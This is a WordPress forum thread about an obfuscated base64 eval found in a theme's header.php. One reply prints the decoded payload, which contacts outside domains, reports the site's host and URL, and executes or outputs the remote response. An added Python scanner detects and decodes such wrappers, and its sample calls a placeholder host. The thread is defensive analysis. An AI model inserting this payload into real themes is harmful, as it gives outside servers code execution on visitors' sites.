Nasty base64 code in header.php – Can you decode

  • Downloaded a theme and found this in header.php. Unfortunately I shortly activated the theme on my server and I am afraid that it did something nasty there

    <?php @eval(@base64_decode('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')); ?>

Viewing 15 replies - 1 through 15 (of 27 total)
  • Here’s what I got when I used OpinionatedGeek’s decoder at http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

    // Probe the call-home domains with a 3-second timeout; remember which one answered (the variable is a hash-like name chosen by the obfuscator)
    if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
    elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
    else
        $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
    // A flag set through eval() for no reason other than obfuscation
    @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
    if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
        // allow_url_fopen is on: fetch w1.php from the chosen domain, passing the visitor's request URI and this site's hostname, and execute whatever comes back
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
        @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
    } else {
        // allow_url_fopen is off: fetch w0.php with the same parameters and print the response straight into the page
        $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
        $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
        @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
    }
    fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

    Thanks a lot. I had the same result with some online decoder and thought it wasn’t fully decoded yet but it probably is?

    Looks like it’s trying its own server availability and then sending the URL that the theme is running on and the surfer’s IP’s host name to its servers, and sending a file to the surfer?

    Can anybody shed some light on what the script is doing?
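    As an added example (not code from this thread or from the theme), a Python script that finds the eval(base64_decode('...')) wrapper in a PHP file, decodes it without executing anything (repeatedly, since one layer can hide another, which is what the "not fully decoded yet" doubt above is about), and lists the call-home functions the payload uses. The sample header.php, its payload and the domain are constructed placeholders.

```python
import base64
import re

# Matches eval(base64_decode('...')) with optional "@" suppressors, as in the theme's header.php.
EVAL_B64 = re.compile(
    r"@?\beval\s*\(\s*@?\bbase64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# Calls that, inside a hidden payload, point to call-home or remote code loading.
SUSPICIOUS = ("eval", "fsockopen", "file_get_contents", "readfile", "curl_exec", "system", "exec")


def decode_payloads(php_source: str, max_depth: int = 5) -> list:
    """Decode each eval(base64_decode()) layer in turn, outermost first; a layer may wrap another."""
    layers, current = [], php_source
    for _ in range(max_depth):
        match = EVAL_B64.search(current)
        if not match:
            break
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", match.group(2)), validate=True)
        except ValueError:  # not valid base64: stop rather than guess
            break
        current = raw.decode("utf-8", "replace")
        layers.append(current)
    return layers


def suspicious_calls(payload: str) -> list:
    """Names from SUSPICIOUS that are called in the decoded payload."""
    return [n for n in SUSPICIOUS if re.search(r"\b" + n + r"\s*\(", payload)]


def scan(php_source: str) -> dict:
    """Summarise a PHP file: how many layers were hidden and what the innermost one calls."""
    layers = decode_payloads(php_source)
    inner = layers[-1] if layers else ""
    return {"layers": len(layers), "innermost": inner, "calls": suspicious_calls(inner)}


def wrap_in_eval(php: str) -> str:
    """Build an obfuscated wrapper in the same shape as the one found in header.php (for the sample)."""
    return "<?php @eval(@base64_decode('" + base64.b64encode(php.encode()).decode() + "')); ?>"


# Constructed sample: same logic shape as the decoded payload in the thread, placeholder domain.
INNER = ('if($h=@fsockopen("www.example.invalid",80,$e,$s,3)){'
         '@eval(@file_get_contents("http://www.example.invalid/w1.php?host=".urlencode($_SERVER["HTTP_HOST"])));}')
SAMPLE_HEADER = "<?php get_header(); ?>\n" + wrap_in_eval(INNER) + "\n<div id=\"header\"></div>\n"

if __name__ == "__main__":
    print(scan(SAMPLE_HEADER))
```

    Run it over every .php file in a downloaded theme before activating it; anything reporting one or more layers deserves a manual read of the innermost payload.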

    whooami

    (@whooami)

    Member

    Not sure how that answers my question whooami. Go troll in another thread

    whooami

    (@whooami)

    Member

    it only answers your question if you actually read what’s on those links.

    how about you go take your pissy attitude back to your hole. did you really need someone to regurgitate what’s available elsewhere?

    Nice that you noticed the code, props for that, but don’t take your bitchiness about it out on me. I didn’t put it there.

    Not sure how that answers my question whooami. Go troll in another thread

    and

    Can anybody shed some light on what the script is doing?

    You clearly don’t know who you’re dealing with. Whoo is a security expert, you nimrod. Can’t be bothered to click on a link that might not only shed light on your problem but also help PREVENT you from making the mistake that brought you here in the first place?

    Un-freaking-believable.

    Well whooami you were snippy from the get go. I apologize for not actually reading the content of the links and for calling your post trolling but you shouldn’t need to get all shook up now. I got to wpsphere through an Adsense ad on google.com an hour ago. I had to assume that their scam is fairly new or the ad wouldn’t be running on #1 in adsense. I actually acted fairly knowledgeable and figured it out quick, and reported them to adsense, too. And the links you mentioned do indeed NOT explain more than I already figured out myself, the second link mentions that it could be “very, very, very dangerous”.

    Great, yet another name caller arrived.

    The links didn’t contain anything that I had not figured out myself. And obviously I was the first one to actually report them. So calm down jonimueller or whoever is going to chime in next.

    whooami

    (@whooami)

    Member

    I’m by no means an expert, but gee thanks 😛

    You’re pretty knowledgeable, certainly more so than me! (Which of course isn’t saying much.)

    Curious – I just read over the GPL to find out, and I think I know the answer, but just to make sure – you can, when releasing a theme, specify that it not be modified unless

    “a) The work must carry prominent notices stating that you modified it, and giving a relevant date.”

    Can you specify that the theme not be distributed, and downloaded only from a specific place?

    You can try, Rose. There was an outfit here a while back, I think Matt’s lawyers finally shut him down b/c he had “WordPress” in his domain name, but he was selling some prepackaged WordPress with over 100 free themes (5 of them were ours) for $197 a pop. That was pretty galling if you ask me. So you can ASK, but the Internet isn’t polite society, so I wouldn’t count on that stopping anyone.

    @bytes .. Well you asked “Can anybody shed some light on it?” and immediately after, you got your answer in the form of some (helpful) links. So if you already knew the answer, why the question? Oh, and sorry, but I will decide when and whether I will sit down and shut up. But thanks for trying. My husband’s been at it for over 30 years and he hasn’t had any more luck than you. 😉

    Actually, I should have been more clear. Can you specify that the theme not be distributed, and still release it under GPL? Forgive my ignorance – I can’t figure out the answer to that from the license itself.

    When I download a theme that has that I see if they offer a live preview. If they do then view the source of the page and grab the code you need from there and use it instead of that other code.

    Example: if the scrambled code is in the footer then go to the live preview and view source, then scroll down till you get to the footer and take the code from the view source and replace the scrambled code with it.

    P.S. whooami is a butt hole to everyone, just ignore him.

    @erichamby whooami is a she if I am not wrong =D
